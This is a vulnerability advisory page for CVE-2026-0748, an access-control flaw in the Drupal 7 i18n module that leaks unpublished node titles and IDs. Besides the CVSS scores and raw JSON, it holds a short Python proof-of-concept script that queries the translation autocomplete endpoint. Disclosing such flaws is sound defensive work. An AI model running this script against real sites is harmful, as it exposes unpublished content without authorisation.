Security Vulnerability Report
CVE-2026-0748 CVSS 4.3 MEDIUM

Published: 2026-03-26 22:16:27
Last Modified: 2026-04-01 16:22:15

Description

In the Drupal 7 Internationalization (i18n) module, the i18n_node submodule allows a user with both "Translate content" and "Administer content translations" permissions to view and attach unpublished nodes via the translation UI and its autocomplete widget. This bypasses intended access controls and discloses unpublished node titles and IDs. Exploit affects versions 7.x-1.0 up to and including 7.x-1.35.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:internationalization_project:internationalization:*:*:*:*:*:drupal:*:* - VULNERABLE
From (including): 7.x-1.0
Up to (including): 7.x-1.35
Range: 7.x-1.0 to 7.x-1.35

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# Proof of Concept for CVE-2026-0748
# This script demonstrates information disclosure via the autocomplete endpoint.
import requests

target_url = "http://drupal-site.example.com"
# The specific endpoint might vary based on i18n configuration
endpoint = f"{target_url}/i18n/node/autocomplete/translations"

# Attacker requires 'Translate content' and 'Administer content translations' permissions
session = requests.Session()
# Login logic here (cookie or session id)
# session.post(f"{target_url}/user/login", data={...})

# Trigger autocomplete to search for unpublished nodes
params = {"string": "test"}
response = session.get(endpoint, params=params)

if response.status_code == 200:
    print("[+] Potential Leak Detected:")
    print(response.text)
else:
    print("[-] Request Failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0748", "sourceIdentifier": "[email protected]", "published": "2026-03-26T22:16:27.100", "lastModified": "2026-04-01T16:22:14.743", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Drupal 7 Internationalization (i18n) module, the i18n_node submodule allows a user with both \"Translate content\" and \"Administer content translations\" permissions to view and attach unpublished nodes via the translation UI and its autocomplete widget. This bypasses intended access controls and discloses unpublished node titles and IDs. \n\nExploit affects versions 7.x-1.0 up to and including 7.x-1.35."}, {"lang": "es", "value": "En el módulo Internationalization (i18n) de Drupal 7, el submódulo i18n_node permite a un usuario con ambos permisos de 'Traducir contenido' y 'Administrar traducciones de contenido' ver y adjuntar nodos no publicados a través de la interfaz de usuario de traducción y su widget de autocompletado. Esto elude los controles de acceso previstos y revela los títulos e IDs de nodos no publicados. 
El exploit afecta a las versiones 7.x-1.0 hasta la 7.x-1.35 inclusive."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", 
"integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-276"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:internationalization_project:internationalization:*:*:*:*:*:drupal:*:*", "versionStartIncluding": "7.x-1.0", "versionEndIncluding": "7.x-1.35", "matchCriteriaId": "7CA4C6BB-F2EE-4207-95F1-BADE7B086C4F"}]}]}], "references": [{"url": "https://d7es.tag1.com/node/86", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.herodevs.com/vulnerability-directory/cve-2026-0748", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.herodevs.com/vulnerability-directory/cve-2026-0748?nes-for-drupal-7", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}